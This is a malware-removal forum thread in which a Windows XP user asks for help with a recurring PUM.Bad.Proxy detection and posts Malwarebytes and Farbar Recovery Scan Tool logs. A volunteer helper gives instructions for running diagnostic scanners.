Jump to content

PLUM.Bad.Proxy returns


Recommended Posts

I scan the system and it finds two files. Malwarebytes cleans them and everything is fine until I restart my computer and the malware is back.

Thanks for any help.

 

 Below is the log information:

-----------------------------------------------------------

Malwarebytes Anti-Malware 1.75.0.1300
www.malwarebytes.org

Database version: v2014.03.18.05

Windows XP Service Pack 3 x86 NTFS
Internet Explorer 8.0.6001.18702
Buddy Harris :: EMACHINE-98E05C [administrator]

3/19/2014 8:27:20 AM
mbam-log-2014-03-19 (08-27-20).txt

Scan type: Quick scan
Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
Scan options disabled: P2P
Objects scanned: 224542
Time elapsed: 22 minute(s), 4 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 1
HKCU\Software\Re_Markable (PUP.Optional.ReMarkable.A) -> Quarantined and deleted successfully.

Registry Values Detected: 1
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings|ProxyServer (PUM.Bad.Proxy) -> Data: http=127.0.0.1:13828 -> Quarantined and deleted successfully.

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

(end)
 

Link to post
Share on other sites

  • Replies 50
  • Created
  • Last Reply

Top Posters In This Topic

Hi there,
my name is Marius and I will assist you with your malware related problems.

Before we move on, please read the following points carefully.

  • First, read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
  • Perform everything in the correct order. Sometimes one step requires the previous one.
  • If you have any problems while following my instructions, Stop there and tell me the exact nature of your problem.
  • Do not run any other scans without instruction or add/remove software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
  • Post all logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
  • If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.
  • Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.
  • My first language is not english. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.

 
 
 
Scan with FRST in normal mode

Please download Farbar's Recovery Scan Tool to your desktop: FRST 32bit or FRST 64bit (If not sure: Start --> Computer (right click) --> properties)

  • Run FRST.
  • Don´t change one of the checkboxes and hit Scan.
  • Logfiles are created on your desktop.
  • Poste the FRST.txt and (after the first scan only!) the Addition.txt.

 

 

 

Scan with TDSS-Killer

Please read and follow these instructions carefully. We do not want it to fix anything yet (if found), we need to see a report first.

Download TDSSKiller.zip and extract to your desktop

  • Execute TDSSKiller.exe by doubleclicking on it.
  • Press Start Scan
  • If Malicious objects are found, do NOT select Copy to quarantine. Change the action to Skip, and save the log.
  • Once complete, a log will be produced at the root drive which is typically C:\ ,for example, C:\TDSSKiller.<version_date_time>log.txt



Please post the contents of that log in your next reply.

Link to post
Share on other sites

Hi,

Thank you very much for offering to help.

 

I'm trying to find out if my system is 16 bit or 32 bit. The only information in my properties is the following:

 

System
Microsoft Windows XHome Edition
Version 2002
Service Pack 3

Registered to:
*My Name

76477-OEM-0011903-oo1oo

eMachines Inc.
eMachinesSystem
AMD Athlon Processor
2650e
1.61GHz, 896 MB of RAM
Physical Address Extension

Link to post
Share on other sites

OK, Here are the log files from Farbar's Recovery Scan Tool.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 13-03-2014  01
Ran by Buddy Harris (administrator) on EMACHINE-98E05C on 20-03-2014 09:51:44
Running from C:\Documents and Settings\Buddy Harris\Desktop
Microsoft Windows XP Home Edition Service Pack 3 (X86) OS Language: English(US)
Internet Explorer Version 8
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(Microsoft Corporation) c:\Program Files\Microsoft Security Client\MsMpEng.exe
() C:\Program Files\Re-Markable\Re-Markable_wd.exe
(Microsoft Corporation) C:\WINDOWS\system32\netdde.exe
(Agere Systems) C:\WINDOWS\system32\agrsmsvc.exe
(Microsoft Corporation) C:\WINDOWS\system32\cisvc.exe
(Microsoft Corporation) C:\WINDOWS\system32\clipsrv.exe
(Sun Microsystems, Inc.) C:\Program Files\Java\jre6\bin\jqs.exe
() C:\Program Files\CyberLink\Shared files\RichVideo.exe
(Microsoft Corp., Veritas Software) C:\WINDOWS\System32\dmadmin.exe
(Realtek Semiconductor Corp.) C:\WINDOWS\RTHDCPL.EXE
(Cyberlink Corp.) C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
(Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Sun Microsystems, Inc.) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(CyberLink) C:\Program Files\CyberLink\Power2Go\CLMLSvc.exe
(CyberLink) C:\Program Files\CyberLink\YouCam\YCMMirage.exe
(Dropbox, Inc.) C:\Documents and Settings\Buddy Harris\Application Data\Dropbox\bin\Dropbox.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
(Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
(Sun Microsystems, Inc.) C:\Program Files\Common Files\Java\Java Update\jucheck.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\Program Files\Outlook Express\msimn.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Jasc Software, Inc.) C:\Program Files\Jasc Software Inc\Paint Shop Pro 7\psp.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\plugin-container.exe
(Microsoft Corporation) C:\WINDOWS\System32\mshta.exe
(RealNetworks, Inc.) C:\Program Files\Common Files\Real\Update_OB\realsched.exe
() C:\Program Files\Re-Markable\Re-Markable154.exe


==================== Registry (Whitelisted) ==================

HKLM\...\Run: [RTHDCPL] - C:\WINDOWS\RTHDCPL.EXE [16862720 2008-05-16] (Realtek Semiconductor Corp.)
HKLM\...\Run: [Alcmtr] - C:\WINDOWS\ALCMTR.EXE [69632 2005-05-03] (Realtek Semiconductor Corp.)
HKLM\...\Run: [RemoteControl] - C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe [71216 2007-03-15] (Cyberlink Corp.)
HKLM\...\Run: [LanguageShortcut] - C:\Program Files\CyberLink\PowerDVD\Language\Language.exe [52256 2007-01-09] ()
HKLM\...\Run: [iMJPMIG8.1] - C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE [208952 2008-04-14] (Microsoft Corporation)
HKLM\...\Run: [Windows Defender] - C:\Program Files\Windows Defender\MSASCui.exe [866584 2006-11-03] (Microsoft Corporation)
HKLM\...\Run: [TkBellExe] - C:\Program Files\Common Files\Real\Update_OB\realsched.exe [202256 2010-03-22] (RealNetworks, Inc.)
HKLM\...\Run: [Adobe ARM] - C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\Run: [MSC] - c:\Program Files\Microsoft Security Client\msseces.exe [948440 2013-10-23] (Microsoft Corporation)
HKLM\...\Run: [sunJavaUpdateSched] - C:\Program Files\Common Files\Java\Java Update\jusched.exe [254896 2012-09-17] (Sun Microsystems, Inc.)
HKLM\...\Run: [CLMLServer] - C:\Program Files\CyberLink\Power2Go\CLMLSvc.exe [107816 2011-03-09] (CyberLink)
HKLM\...\Run: [updateP2GoShortCut] - C:\Program Files\CyberLink\Power2Go\MUITransfer\MUIStartMenu.exe [223128 2012-07-25] (CyberLink Corp.)
HKLM\...\Run: [uCam_Menu] - C:\Program Files\CyberLink\YouCam\MUITransfer\MUIStartMenu.exe [222504 2009-05-19] (CyberLink Corp.)
HKLM\...\Run: [YouCam Mirage] - C:\Program Files\CyberLink\YouCam\YCMMirage.exe [136488 2012-06-14] (CyberLink)
HKLM\...\Run: [YouCam Tray] - C:\Program Files\CyberLink\YouCam\YouCam.exe [234000 2012-06-14] (CyberLink Corp.)
HKLM\...\Run: [updatePSTShortCut] - C:\Program Files\CyberLink\Media Suite\MUITransfer\MUIStartMenu.exe [222504 2012-06-25] (CyberLink Corp.)
HKU\.DEFAULT\...\Run: [DWQueuedReporting] - C:\Program Files\Common Files\Microsoft Shared\DW\DWTRIG20.EXE [434080 2011-07-27] (Microsoft Corporation)
HKU\.DEFAULT\...\RunOnce: [FlashPlayerUpdate] - C:\WINDOWS\system32\Macromed\Flash\FlashUtil32_11_9_900_170_ActiveX.exe -update activex
HKU\.DEFAULT\...\RunOnce: [Del1175380656] - cmd.exe /Q /D /c del "C:\WINDOWS\TEMP\0.del"
HKU\.DEFAULT\...\RunOnce: [Del26093359] - cmd.exe /Q /D /c del "C:\WINDOWS\TEMP\0.del"
HKU\S-1-5-21-608057341-2165517387-3308722516-1005\...\Run: [Optimizer Pro] - C:\Program Files\Optimizer Pro\OptProLauncher.exe [134648 2013-10-28] ()
AppInit_DLLs: c:\progra~1\google\google~1\goec62~1.dll => C:\Program Files\Google\Google Desktop Search\GoogleDesktopNetwork3.dll [119296 2009-03-13] (Google)
AppInit_DLLs:  c:\progra~1\optimi~1\optpro~1.dll => C:\Program Files\Optimizer Pro\OptProCrash.dll [4074824 2013-10-29] ()
Lsa: [Notification Packages] :\WINDOW
Startup: C:\Documents and Settings\Buddy Harris\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Documents and Settings\Buddy Harris\Application Data\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
Startup: C:\Documents and Settings\Buddy Harris\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x02A8FBF3371ACC01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.com/
URLSearchHook: HKCU - (No Name) - {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} -  No File
SearchScopes: HKLM - {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL =
SearchScopes: HKCU - DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = http://search.conduit.com/Results.aspx?ctid=CT3310031&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SPDC1460A6-8C8C-42BA-A33D-8C553CCAC6BF&q={searchTerms}&SSPV=
SearchScopes: HKCU - {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = http://search.conduit.com/Results.aspx?ctid=CT3310031&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SPDC1460A6-8C8C-42BA-A33D-8C553CCAC6BF&q={searchTerms}&SSPV=
SearchScopes: HKCU - {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL = http://www1.delta-search.com/?q={searchTerms}&babsrc=SP_ss&mntrId=3C08001D72BB6390&affID=119351&tt=160211_ask&tsp=4958
SearchScopes: HKCU - {5424D314-A768-475D-A25D-96E21FCFEB38} URL = http://search.yahoo.com/search?p={searchterms}&ei=UTF-8&fr=w3i&type=W3i_DS,136,0_0,Search,20111146,6901,0,8,0
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL =
SearchScopes: HKCU - {8562D569-A136-4028-B9CF-4E01D372E2F4} URL = https://www.google.com/search?q={searchTerms}
BHO: No Name - {02478D38-C3F9-4efb-9B51-7695ECA05670} -  No File
BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Documents and Settings\All Users\Application Data\Real\RealPlayer\BrowserRecordPlugin\IE\rpbrowserrecordplugin.dll (RealPlayer)
BHO: Java Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll (Sun Microsystems, Inc.)
BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO: deAl4me - {BA7B8F3A-20D1-34E9-3785-0CFE3833AFA8} -  No File
BHO: Java Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
BHO: JQSIEStartDetectorImpl Class - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll (Sun Microsystems, Inc.)
Toolbar: HKCU - No Name - {472734EA-242A-422B-ADF8-83D1E48CC825} -  No File
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
DPF: {6A060448-60F9-11D5-A6CD-0002B31F7455}
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_37-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_37-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_37-windows-i586.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll (Microsoft Corporation)
Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - c:\Program Files\Common Files\Microsoft Shared\Information Retrieval\msitss.dll (Microsoft Corporation)
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll (Microsoft Corporation)
ShellExecuteHooks: Microsoft AntiMalware ShellExecuteHook - {091EB208-39DD-417D-A5DD-7E2C2D8FB9CB} - C:\Program Files\Windows Defender\MpShHook.dll [83224 2006-11-03] (Microsoft Corporation)
Winsock: Catalog5 01 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Winsock: Catalog5 03 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Winsock: Catalog9 04 mswsock.dll File Not found ()
Winsock: Catalog9 05 mswsock.dll File Not found ()
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1

FireFox:
========
FF ProfilePath: C:\Documents and Settings\Buddy Harris\Application Data\Mozilla\Firefox\Profiles\rx2a4r2n.default-1387638332015
FF Homepage: https://www.google.com/
FF Plugin: @adobe.com/FlashPlayer - C:\WINDOWS\system32\Macromed\Flash\NPSWF32_12_0_0_77.dll ()
FF Plugin: @exent.com/npExentCtl,version=7.0.0.0 - C:\Program Files\Free Ride Games\npExentCtl.dll (Exent Technologies Ltd.)
FF Plugin: @Google.com/GoogleEarthPlugin - C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin: @java.com/DTPlugin,version=1.6.0_37 - C:\WINDOWS\system32\npdeployJava1.dll (Sun Microsystems, Inc.)
FF Plugin: @java.com/JavaPlugin - C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 - C:\Program Files\Yahoo!\Shared\npYState.dll (Yahoo! Inc.)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=14.0.8051.1204 - C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: @real.com/nppl3260;version=6.0.12.732 - c:\program files\real\realplayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprjplug;version=1.0.3.732 - c:\program files\real\realplayer\Netscape6\nprjplug.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprphtml5videoshim;version=1.0.0.0 - C:\Documents and Settings\All Users\Application Data\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprphtml5videoshim.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprpjplug;version=6.0.12.732 - c:\program files\real\realplayer\Netscape6\nprpjplug.dll (RealNetworks, Inc.)
FF Plugin: @tools.google.com/Google Update;version=3 - C:\Program Files\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 - C:\Program Files\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @videolan.org/vlc,version=2.0.3 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.1.2 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.1.3 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin: Adobe Reader - C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppl3260.dll (RealNetworks, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nprjplug.dll (RealNetworks, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nprpjplug.dll (RealNetworks, Inc.)
FF Extension: Status-4-Evar - C:\Documents and Settings\Buddy Harris\Application Data\Mozilla\Firefox\Profiles\rx2a4r2n.default-1387638332015\Extensions\status4evar@caligonstudios.com.xpi [2013-12-21]
FF Extension: Java Console - C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} [2014-02-14]
FF Extension: Java Console - C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} [2014-02-14]
FF HKLM\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\Documents and Settings\All Users\Application Data\Real\RealPlayer\BrowserRecordPlugin\Firefox\Ext
FF Extension: RealPlayer Browser Record Plugin - C:\Documents and Settings\All Users\Application Data\Real\RealPlayer\BrowserRecordPlugin\Firefox\Ext [2010-03-22]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\
FF Extension: Microsoft .NET Framework Assistant - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\ []
FF HKLM\...\Firefox\Extensions: [jqs@sun.com] - C:\Program Files\Java\jre6\lib\deploy\jqs\ff
FF Extension: Java Quick Starter - C:\Program Files\Java\jre6\lib\deploy\jqs\ff [2012-09-27]
FF HKLM\...\Firefox\Extensions: [ocr@babylon.com] - C:\Program Files\Babylon\Babylon-Pro\Utils\ocr@babylon.com

Chrome:
=======


CHR DefaultSearchKeyword: conduit.search
CHR DefaultSearchProvider: Conduit Search
CHR DefaultSearchURL: http://search.conduit.com/Results.aspx?ctid=CT3310031&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SPDC1460A6-8C8C-42BA-A33D-8C553CCAC6BF&q={searchTerms}&SSPV=
CHR DefaultNewTabURL:
CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\31.0.1650.63\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Shockwave Flash) - C:\WINDOWS\system32\Macromed\Flash\NPSWF32_11_4_402_278.dll No File
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files\Google\Chrome\Application\31.0.1650.63\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\31.0.1650.63\pdf.dll ()
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (RealPlayer G2 LiveConnect-Enabled Plug-In (32-bit) ) - C:\Program Files\Mozilla Firefox\plugins\nppl3260.dll (RealNetworks, Inc.)
CHR Plugin: (RealPlayer Version Plugin) - C:\Program Files\Mozilla Firefox\plugins\nprpjplug.dll (RealNetworks, Inc.)
CHR Plugin: (RealPlayer HTML5VideoShim Plug-In (32-bit) ) - C:\Documents and Settings\All Users\Application Data\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprphtml5videoshim.dll (RealNetworks, Inc.)
CHR Plugin: (RealJukebox NS Plugin) - C:\Program Files\Mozilla Firefox\plugins\nprjplug.dll (RealNetworks, Inc.)
CHR Plugin: (Microsoft\xC3\x82\xC2\xAE DRM) - C:\Program Files\Windows Media Player\npdrmv2.dll (Microsoft Corporation)
CHR Plugin: (Microsoft\xC3\x82\xC2\xAE DRM) - C:\Program Files\Windows Media Player\npwmsdrm.dll (Microsoft Corporation)
CHR Plugin: (Windows Media Player Plug-in Dynamic Link Library) - C:\Program Files\Windows Media Player\npdsplay.dll (Microsoft Corporation (written by Digital Renaissance Inc.))
CHR Plugin: (Exent\xC3\x82\xC2\xAE AOD Gecko Plugin) - C:\Program Files\Free Ride Games\npExentCtl.dll (Exent Technologies Ltd.)
CHR Plugin: (Google Earth Plugin) - C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll (Google)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll No File
CHR Plugin: (Java Platform SE 6 U35) - C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll (Sun Microsystems, Inc.)
CHR Plugin: (Java Deployment Toolkit 6.0.350.10) - C:\WINDOWS\system32\npdeployJava1.dll (Sun Microsystems, Inc.)
CHR Plugin: (VLC Web Plugin) - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
CHR Plugin: (Windows Live\xC3\x82\xC2\xAE Photo Gallery) - C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (Silverlight Plug-In) - c:\Program Files\Microsoft Silverlight\4.1.10329.0\npctrl.dll No File
CHR Plugin: (Windows Presentation Foundation) - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
CHR Extension: (deAl4me) - C:\Documents and Settings\Buddy Harris\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bhdkbbbdgijnmanhokhaongilcekhmjh [2014-01-24]
CHR Extension: (Ratchet & Clank Future 2) - C:\Documents and Settings\Buddy Harris\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\ejhfomhehcinmhgnlhdpghklkjgppdmn [2012-10-08]
CHR Extension: (SaleusiCHeckeer) - C:\Documents and Settings\Buddy Harris\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\flcmoidkcnpijacjjkldfjfjpgeobggf [2014-03-17]
CHR Extension: (Bargain Workbench) - C:\Documents and Settings\Buddy Harris\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\gebcpofjimbbchggpnfcaiieolloeodp [2014-02-22]
CHR Extension: (RealPlayer HTML5Video Downloader Extension) - C:\Documents and Settings\Buddy Harris\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jfmjfhklogoienhpfnppmbcbjfjnkonk [2012-09-28]
CHR Extension: (Remove \) - C:\Documents and Settings\Buddy Harris\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\kcendgajlhoaiiccpijilcpmgphfflnj [2013-08-01]
CHR Extension: (BargainJoy) - C:\Documents and Settings\Buddy Harris\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\khongjfjjmklggionajlpjcpmnppdace [2014-02-22]
CHR Extension: (Torch Share) - C:\Documents and Settings\Buddy Harris\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\kiplfnciaokpcennlkldkdaeaaomamof [2014-02-22]
CHR Extension: (We-Care Reminder Lite) - C:\Documents and Settings\Buddy Harris\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\lkpmjnommfoljgjbckjmjhkmnhfmcmon [2012-09-28]
CHR Extension: (Deealu44Real) - C:\Documents and Settings\Buddy Harris\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\openkkkcbebpnegmpipkfpbfpjmdonmf [2014-02-13]
CHR HKLM\...\Chrome\Extension: [gebcpofjimbbchggpnfcaiieolloeodp] - C:\DOCUME~1\BUDDYH~1\LOCALS~1\APPLIC~1\BargainWorkbench.crx [2013-09-04]
CHR HKLM\...\Chrome\Extension: [gpicboiclhmnllnjdcfcffifpoaebgkm] - C:\Program Files\Freecorder extension\Freecorder.crx [2013-09-04]
CHR HKLM\...\Chrome\Extension: [jfmjfhklogoienhpfnppmbcbjfjnkonk] - C:\Documents and Settings\All Users\Application Data\Real\RealPlayer\BrowserRecordPlugin\Chrome\Ext\rphtml5video.crx [2010-03-22]
CHR HKLM\...\Chrome\Extension: [kcendgajlhoaiiccpijilcpmgphfflnj] - C:\DOCUME~1\BUDDYH~1\LOCALS~1\APPLIC~1\newhb.crx [2013-08-01]
CHR HKLM\...\Chrome\Extension: [khongjfjjmklggionajlpjcpmnppdace] - C:\DOCUME~1\BUDDYH~1\LOCALS~1\APPLIC~1\BargainJoy.crx [2013-09-14]
CHR HKLM\...\Chrome\Extension: [lkpmjnommfoljgjbckjmjhkmnhfmcmon] - C:\Documents and Settings\All Users\Application Data\WeCareReminder\\wecarereminderro.crx [2011-07-08]
CHR HKLM\...\Chrome\Extension: [niapdbllcanepiiimjjndipklodoedlc] - C:\DOCUME~1\BUDDYH~1\LOCALS~1\Temp\YontooLayers.crx [2011-07-08]
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

========================== Services (Whitelisted) =================

R2 ca82e1a5; C:\Program Files\Optimizer Pro\OptProCrashSvc.dll [190616 2013-12-15] ()
S2 ETService; C:\Program Files\EMACHINES\eMachines Recovery Management\Service\ETService.exe [20492 2008-07-16] ()
S4 GameConsoleService; C:\Program Files\eMachines Games\eMachines Game Console\GameConsoleService.exe [157144 2008-05-05] (WildTangent, Inc.)
S3 GoogleDesktopManager-092308-165331; C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe [30192 2009-03-13] (Google)
R2 JavaQuickStarterService; C:\Program Files\Java\jre6\bin\jqs.exe [153584 2012-09-24] (Sun Microsystems, Inc.)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22208 2013-10-23] (Microsoft Corporation)
R2 Re-Markable; C:\Program Files\Re-Markable\Re-Markable154.exe [181248 2014-02-23] ()
R2 RichVideo; C:\Program Files\CyberLink\Shared files\RichVideo.exe [264424 2007-05-13] ()
S2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [6432 2006-11-03] (Microsoft Corporation)
S3 rpcapd; "%ProgramFiles%\WinPcap\rpcapd.exe" -d -f "%ProgramFiles%\WinPcap\rpcapd.ini" [X]

